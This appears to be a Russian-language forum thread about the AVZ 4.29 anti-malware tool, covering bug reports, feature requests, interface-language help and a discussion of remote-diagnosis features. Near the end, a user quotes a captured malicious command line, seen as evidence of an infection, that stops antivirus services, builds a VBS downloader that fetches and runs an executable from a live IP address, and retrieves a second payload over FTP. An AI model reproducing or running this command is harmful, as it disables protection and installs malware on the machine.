AVZ 4.29

[QUOTE=Maxim;160032]3. AVZ - Файл - Стандартные скрипты - №4, добавить сбор не запущенных служб и драйверов. Иначе хелперы быстро устанут читать километровые логи.[/QUOTE]А это будет реализовано или нет?

[quote=Maxim;160215]А это будет реализовано или нет?[/quote]
А что, оно не работает сейчас ? Вроде как должно ... по крайней мере в логи исследования информация о них пишется, эжто проверено. Про скрипт сбора файлов вроде речь не шла, когда обсуждали доработки

Должно быть Вы просто не заметили моё сообщение. Сейчас скрипт собирает только запущенные драйвера.

[quote=Зайцев Олег;160167]Ну, трояны и outpost я немментировать не буду (так как не этично),[/quote]
Этично - я и там бета-тестер. :)

[quote=Зайцев Олег;160167] но дам подсказку - запуск TFT/TFTP скорее всего следствие эксплоита, следовательно или outpost по непонятной причине пропускает пакеты с эксплоитом на компьютер (нарушена его работа, правила корявые и т.п.), или он вообще толком не работает (правила, повреждение трояном).[/quote]
Это понятно, и я даже нашёл в чём дело. Как ни стрнно, в доверенных был FireFox. Дети, что-ли его туда загнали. У меня и впрямь половина функций на файрволе отключена.

Мне другое непонятно:
1) Через какую дырку входит эксплойт.
2) Почему AVZ не видит, что эксплойт работает.
3) И может ли AVZ выявлять зловреда на стадии его внедрения в систему.
4) Ну и главное. Нет ли спрособа заделать эту дырку.

Да, все последние патчи, что MS, что FireFox разумеется поставлены.

Доброго времени суток !

Скачал новую AVZ 2.29 проверил и мне выдало :

9. Мастер поиска и устранения проблем
>> Таймаут завершения служб находится за пределами допустимых значений

Этот как понять? если это вредно/опасно то можно уменьшить его как то ? если да то где...

Заранее благодарен.

[QUOTE=tar;160174]теперь ревизор совсем накрылся - не проверяет файлы по таблицам[/QUOTE]
Подтверждаю, ревизор накрылся, и у типа файлов для ревизора(frz) стоит странное название: "$avz1129" но это мелочи

[quote=Jef239;160275]Этично - я и там бета-тестер. :)


Это понятно, и я даже нашёл в чём дело. Как ни стрнно, в доверенных был FireFox. Дети, что-ли его туда загнали. У меня и впрямь половина функций на файрволе отключена.

Мне другое непонятно:
1) Через какую дырку входит эксплойт.
2) Почему AVZ не видит, что эксплойт работает.
3) И может ли AVZ выявлять зловреда на стадии его внедрения в систему.
4) Ну и главное. Нет ли спрособа заделать эту дырку.

Да, все последние патчи, что MS, что FireFox разумеется поставлены.[/quote]
Могу угадать - система W2K, последние обновления стоят ? Знаю такое дело, это неизлечимо - нужно XP ставить. Дело в том, что в W2K есть уязвимости, до сих пор не закрытые обновлениями. И есть размножающийся по сети зловред - из семейства RBOT, который эти уязвимости эксплуатирует. Т.е. если он гуляет в локальной сети, то спасения от него нет (кроме как убрать протоколы MS (общий доступ к файлам и принтерам и клиент для сети MS), оставив в настройках сетевого соединения только TCP/IP).
1. См. выше
2. А он и не увидит. Эксплоит - это же 20-30 байт кода где-то в памяти легитимного процесса (подробно описывать долго - есть хорошая книжка Криса Касперски, там даже пример есть эксплоита и демонстрания его работы).
3. Нет. Это обязанность Firewall - прибить пакет с эксплоитом, выявив его по сигнатурам. Или проактивки - обнаружить ненормальное поведение системного процесса и вовремя блокировать
4. Установить XP или отключиться от сети MS. Есть конечно путь временной защиты - переименовать [URL="ftp://ftp.exe"]ftp.exe[/URL] и tftp.exe в что-то там типа _ftp.exe и _tftp.exe

Скачал новую версию, обновился, но она на англ. языке. Как мне переключится на русский? Скажите пожалуйста, мне надо сделать лог [I][B]virusinfo_syscure.zip[/B][/I] для раздела[B][I] "[/I]Помогите"[/B]

[quote=Tarik;160456]Скачал новую версию, обновился, но она на англ. языке. Как мне переключится на русский? Скажите пожалуйста, мне надо сделать лог [I][B]virusinfo_syscure.zip[/B][/I] для раздела[B][I] "[/I]Помогите"[/B][/quote]
А операционка какая ? Русскоязычная или нет ? Если русский язык не включается, то в системе по умолчанию стоит локаль, отличная от русской. Можно попробовать запустить [B]avz.exe lang=ru[/B] - это принудительно включит русский интерфейс, но не факт, что он будет читабельным.

[quote=Зайцев Олег;160462]А операционка какая ? Русскоязычная или нет ? Если русский язык не включается, то в системе по умолчанию стоит локаль, отличная от русской. Можно попробовать запустить [B]avz.exe lang=ru[/B] - это принудительно включит русский интерфейс, но не факт, что он будет читабельным.[/quote]
ОС русскоязычная XP SP2 с последними заплатками
А как запустить [B]avz.exe lang=ru?[/B] Просто переименовать екзешник?

Переименовал, все по-старому

[quote=Зайцев Олег;160334]Могу угадать - система W2K, последние обновления стоят ? [/quote]
Угу. W2K, и всё обновлено.
[quote=Зайцев Олег;160334]Знаю такое дело, это неизлечимо - нужно XP ставить. Дело в том, что в W2K есть уязвимости, до сих пор не закрытые обновлениями.[/quote]
О!!!!! Спасибо за информацию. Первый разумный довод в пользу установки XP, кстати. Просто есть хорошее правило - не ставить новую ОС до выхода SP3. Потому и сижу на W2K.

[quote=Зайцев Олег;160334]3. Нет. Это обязанность Firewall - прибить пакет с эксплоитом, выявив его по сигнатурам. Или проактивки - обнаружить ненормальное поведение системного процесса и вовремя блокировать[/quote]
И тем не менее, есть две вещи, которые были бы ОЧЕНЬ полезны в данной ситуации.
1) Просмотр родителя процесса. (смотрел утилитой pslist от Русиновича)
2) Просмотр командной строки, с которой запущен процесс.
При помощи первой я понял, через кого внедряется эксплойт и закрыл приложение от сети получше. А вторая полезна, чтобы отличить "зловредный" CMD.EXE от нормального.

Олег, если не трудно, впиши в список пожеланий?

[quote=Зайцев Олег;160334]4. Установить XP или отключиться от сети MS. [/quote]
Сети MS у меня нет. Я же дома работаю. А внедрялся он похоже через SQLServer. По крайней мере дерево запуска было такое - SQLServer-CMD-FTP. Пока прикрыл его FireWallом получше. Не поможет - врублю проактивку и впрямь XP поставлю.

[size="1"][color="#666686"][B][I]Добавлено через 3 минуты[/I][/B][/color][/size]

[quote=Tarik;160465]А как запустить [B]avz.exe lang=ru?[/B][/quote]
:megalol::megalol::megalol:
Создай командный файл CMEРТ_OT_CMEXA.CMD.
Впиши туда одну строчку - [B]avz.exe lang=ru
[/B]Ну и запускай его вместо AVZ

[quote=Tarik;160465] Переименовал, все по-старому[/quote]
Теперь обратно переименовывай.

[size="1"][color="#666686"][B][I]Добавлено через 1 минуту[/I][/B][/color][/size]

P.S. "Сети MS у меня нет" читать как давно отключен и доступ к файлам и доступ к принтерам. На уровне свойств сетейвой карты отключен.

[quote=Jef239;160469]

:megalol::megalol::megalol:
Создай командный файл CMEРТ_OT_CMEXA.CMD.
Впиши туда одну строчку - [B]avz.exe lang=ru[/B]
Ну и запускай его вместо AVZ[/quote]
Как создать командный файл? Извини, что туплю, не шарю в этих вопросах:blush:

[quote=Tarik;160485]Как создать командный файл? [/quote]
Например в NotePad (блокноте)

Здравствуйте, Олег!

AVZ выдал: "[COLOR=red]таймаут завершения служб находится за пределами допустимых значений[/COLOR]" - что это такое и что с ним делать?
Во время работы в Pinnacle 10.8 (загрузка ЦП 100%) было падение напряжения в сети. ПК ушел на перезагрузку, после не видит драйвера сканера, принтера, не видит флешку, хотя драйвера на месте... Переинсталяция устройств не помогла...
Можно с этим справиться?
Спасибо! С уважением, Павел.

А почему тема переехала в "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
Хотя модераторам виднее...

[quote=Mad Scientist;160707]А почему тема переехала в "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
Хотя модераторам виднее...[/quote]
Не знаю - я вроде не переносил ...

[size="1"][color="#666686"][B][I]Добавлено через 4 минуты[/I][/B][/color][/size]

[quote=Tibet;160515]Здравствуйте, Олег!

AVZ выдал: "[COLOR=red]таймаут завершения служб находится за пределами допустимых значений[/COLOR]" - что это такое и что с ним делать?
Во время работы в Pinnacle 10.8 (загрузка ЦП 100%) было падение напряжения в сети. ПК ушел на перезагрузку, после не видит драйвера сканера, принтера, не видит флешку, хотя драйвера на месте... Переинсталяция устройств не помогла...
Можно с этим справиться?
Спасибо! С уважением, Павел.[/quote]
Таймаут завершения служб находится за пределами допустимых значений - это нужно понимать буквально. Какой-то кривой твикер решил "ускорить" работу системы, предписав таймаут на завершение служб порядка 1 секунды. Многие службы за это время понятное дело завершиться не могут, и при завершении ПК система начинает их принудительно прибивать. Последствия понятное дело непредсказуемы. Лечится из меню "Файл/Мастер поиска и устранения проблем" в AVZ

Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?

[QUOTE=Tarik;160485]Как создать командный файл? Извини, что туплю, не шарю в этих вопросах:blush:[/QUOTE]

В блокнот скопируйте:
[CODE]
avz.exe lang=ru
[/CODE]

И при сохранение документа выберете: [B]Тип файлов: все файлы.[/B]
Укажите имя файла например avz.cmd или avz.bat

Тут главное чтоб расширение файла было cmd или bat

[QUOTE=Mad Scientist;160707]А почему тема переехала в "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
Хотя модераторам виднее...[/QUOTE]
[QUOTE=Зайцев Олег;160750]Не знаю - я вроде не переносил ...
[/QUOTE]

Видимо, я немножко коряво присоединил одно сообщение :rolleyes:

Олег, с Geeks To Go пришел первый фичреквест. :) Хотят интерактивные элементы для генерации скриптов во всех логах (т.е. не только в исследовании системы, но и в логах, сохраняемых из отдельных диспетчеров).

[quote=NickGolovko;160934]Олег, с Geeks To Go пришел первый фичреквест. :) Хотят интерактивные элементы для генерации скриптов во всех логах (т.е. не только в исследовании системы, но и в логах, сохраняемых из отдельных диспетчеров).[/quote]
В теории это возможно, только нужно ли ?! В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.

[QUOTE=Jef239;160469]
Создай командный файл CMEРТ_OT_CMEXA.CMD.
Впиши туда одну строчку - [B]avz.exe lang=ru
[/B]Ну и запускай его вместо AVZ[/QUOTE]

Олег, может имеет смысл добавить avz_ru.cmd и avz_en.cmd прями в архив с программой, чтобы пользователи не мучались?

Мотивируют тем, что в ряде случаев им достаточно запросить лог одного диспетчера и не прогонять полностью все исследование системы. Я, кстати, тоже иногда прошу лог конкретного менеджера. :)

Кажется мой вопрос остался без ответа :unsure: Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?

Проявилась еще одна проблема, Win XP Home SP2 Rus:

[quote]
9. Мастер поиска и устранения проблем
>> Нарушение ассоциации REG файлов
[/quote]

Ассоциация с виду в порядке, если надо, могу скинуть соответствующие ветки реестра.

И два предложения:

1. Писать в программе полную версию билда, а не просто 4.29
2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)

[quote=Maxim;161079]Кажется мой вопрос остался без ответа :unsure: Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?[/quote]
Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)

[QUOTE]2. Распространять дистрибутив через торренты, если агава не справляется. Все же лучше, чем рапидшара =)[/QUOTE]Можно сделать зеркало у нас.

[size="1"][color="#666686"][B][I]Добавлено через 2 минуты[/I][/B][/color][/size]

[QUOTE=Зайцев Олег;161111]Не запрещено, а не разрешено. Если перед выполнением скриптов это разрешить в настройке, то они удаляться. Так было исторически, руткит относится к категории HackTool (равно как эксплоиты, hacktools и т.п.)[/QUOTE]Может забыть историю и перенести руткиты в другую категорию? Жалко хелперов, зачем вручную удалять то, что AVZ не плохо почистит сам на автоматике во время сбора логов?

3. Не во всех менеджерах возможно скопировать в карантин.

[QUOTE=Зайцев Олег;160938]...В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.[/QUOTE]

Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.

[quote=santy;161598]иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.[/quote]
Опосля чего остальные антивирусы запишут AVZ в зловреды? :smile:
Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
Так что если делать - то по специальному ключу и так далее.

[QUOTE=Jef239;161602]Опосля чего остальные антивирусы запишут AVZ в зловреды? :smile:
Гм, возможности AVZ настолько широки, что очень не хотелось бы, чтобы кто-то мог удалённо управлять моей машиной.
Так что если делать - то по специальному ключу и так далее.[/QUOTE]

Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.

[quote=santy;161611]Так все равно это делает юзер с помощью Gain&Abel, Ideal Administration, DameWare Utilities - правда, с админскими правами на удаленной системе.[/quote]
Или хакер при помощи какого-нибудь трояна вроде BackOffice.
Фишка в том, что лично я иметь AVZ на своей машине хочу. А потенциальную дырку для хакера - как-то не хочется. Я лучше имеющиеся в виндах дырки прикрою.
А клиенту админские права на удалённой машине ОБЯЗАТЕЛЬНО должны быть нужны. Даже если это корпоративная сеть без инета. Иначе - НЕБЕЗОПАСНО. Уж слишком много опасного умеет делать AVZ.

[quote=santy;161598]Олег, реально с помощью АВЗ получить исследование удаленной системы? Выполнить анализ лога исследования и автоматически сгенерировать скрипт выполнения, который можно интерактивно поправить... т.е. иметь в составе АВЗ визард-инструмент(типа LC5), который позволяет по ip/mac адресу или путем выбора из сетевого окружения исследовать удаленную систему.[/quote]
Технически я могу конечно ввести в AVZ некую фичу типа RAdmin, которая даст доступ к экрану и клавиатуре/мышке. Если рассуждать чисто гипотетически, то в случае введения этой опции она будет активироваться через меню, функционировать только на сеанс и только пока запущен AVZ, причем для активации нужно будет задавать IP "помошника", его логин, пароль. С другой стороны, сколь актуальна подобная фича ? Ее плюс конечно несомненен - хелпер в сложной ситуации сможет напрямую подключиться к ПК для лечения, минус также несомненен - по сути это "дырка" в безопасности, пусть небольшая, но дырка.
Другой путь решения - это удаленный запуск AVZ с применением скрипта, который изучит систему и пошлет логи куда сказано. Там их изучат, и будет выполнен удаленный запуск AVZ с выполнением скрипта карантина и лечения. По сути идея идентична разделу "Помогите", но с автоматическим запуском - такое применяется у меня в конторе на всех ПК.
Наконец третий вариант самый правильный - это хелпдеск, связанный с ядром AVZ. Т.е. ядро изучает систему, шлет данные хелпдеску (автоматом, через почту при помощи юзера и т.п.). Хелпдеск изучает их с помощью ИР, формирует скрипт (правильный по его мнению) и подключает хелпера. Хелпер изучает предложение ИР, вносит в случае надобности корректуры, далее скрипт идет юзеру, результат - хелпдеску и т.п. по кругу. В данном случае плюс в том, что явного удаленного управления нет, юзер может изучить скрипты и отсылаемые логи, и обмен идет не с ПК некого хелпера (который юзеру в принципе неизвестен), а с хелпдеском, размещенным у уважаемого AV вендора, выступающего в данном случае гарантом безопасности всей этой цепочки. В этой ситуации хелпдеск будет еще и защитой от "хелпера-терориста", так как блокирует явные ошибки в скриптах типа удаления легитимного ПО.

Я за третий вариант ;)

Был бы интересен такой вариант: (естественно, без удаленного управления.... потому что админ по любому сможет в лок.сети подключиться к удаленной системе и запустить АВЗ с общедоступного ресурса). админ, запускает АВЗ на СВОЕЙ машине, запускает процесс исследования на удаленной машине, получает вывод в таблицы_окна, аналогично как мы видим СВОИ процессы, службы, драйвера, автозагрузку и т.д. в менеджерах сервиса с полным анализом процессов, служб, драйверов по базе безопасных файлов АВЗ. Но, соответственно, без (а может с такой возможностью!!!) возможности kill process, добавить в карантин и т.д.. Далее, после просмотра таблицы данных админом запускается анализ и автоматическая генерация скрипта, если необходимо его выполнение.... Т.е. интересно было бы не автоматическое и периодическое сканирование системы - а, тогда, когда в этом есть необходимость, по каким то признакам заражения....

[QUOTE=Jef239;160469]1) Просмотр родителя процесса. (смотрел утилитой pslist от Русиновича)[/QUOTE]может process explorer того же Руссиновича.

[QUOTE=Jef239;160469]2) Просмотр командной строки, с которой запущен процесс.[/QUOTE]может, пути к исполняемому файлу? Тоже может procexp. А всю командную строку получить будет затруднительно, да и незачем.

[quote=maXmo;161703]может process explorer того же Руссиновича.

может, пути к исполняемому файлу? Тоже может procexp. А всю командную строку получить будет затруднительно, да и незачем.[/quote]
AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания).
А вот отображение родительского процесса стоит сделать, это несложно

[quote=santy;161658]Был бы интересен такой вариант: [/quote]
Олег, до меня кажется дошло, что он принципиально нового хочет. Грубо говоря - вычитку XML-логов в формы AVZ. Желательно - с генерацией скрипта по нажатиям кнопок в формах AVZ. Остальное - технические детали пересылки, её можно пока и почтой делать.

Насколько это реально?

[size="1"][color="#666686"][B][I]Добавлено через 56 минут[/I][/B][/color][/size]

[quote=Зайцев Олег;161743]AVZ в исследовании системы показывает командную строку запущенных процессов (в крайней правой колонке, в качестве примечания). [/quote]
Гм, а антивирусный поиск в ней сложно сделать? Я про случай, когда когда законный CMD.EXE выполняет вирусный код. В принципе AVZ может сам отловить это.

[quote=Зайцев Олег;161743] А вот отображение родительского процесса стоит сделать, это несложно[/quote]
СПАСИБО!

А вот и командная строчка
[SIZE=1][I]F:\WINNT\system32\cmd.exe /c net stop "Norton AntiVirus Auto Protect Service"&net stop Mcshield&net stop "Panda Antivirus"&echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://91.122.0.103:2904/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\windmns.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.>>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type = adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath, adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.vbs&start c:\windmns.exe&echo OPEN 91.122.0.103 16467>x&echo GET 27031_mssql.exe>>x&echo QUIT>>x&FTP -n -s:x&27031_mssql.exe&del x&exit[/I][/SIZE]

Олег,

посмотрите, пожалуйста, на строку Автозапуска в протоколе, которая гласит

C:\WINDOWS\S

HJT показывает на ее месте

O4 - HKCU\..\Run: [Gpn] C:\WINDOWS\S?mantec\msdtc.exe

Из-за этого я забыл этот файл в скрипте пользователю. :) Подозреваю, что подобное бывало и ранее, но спрашиваю: фиксабельно? :)

Олег, а почему для процесса номер 8 показывается файл \WINNT\System? Более того, он запихивается в картантин, что явно не порядок.
8 - это idle process, он с файлом не связан. Так что - всегда зелёное исключение должно быть.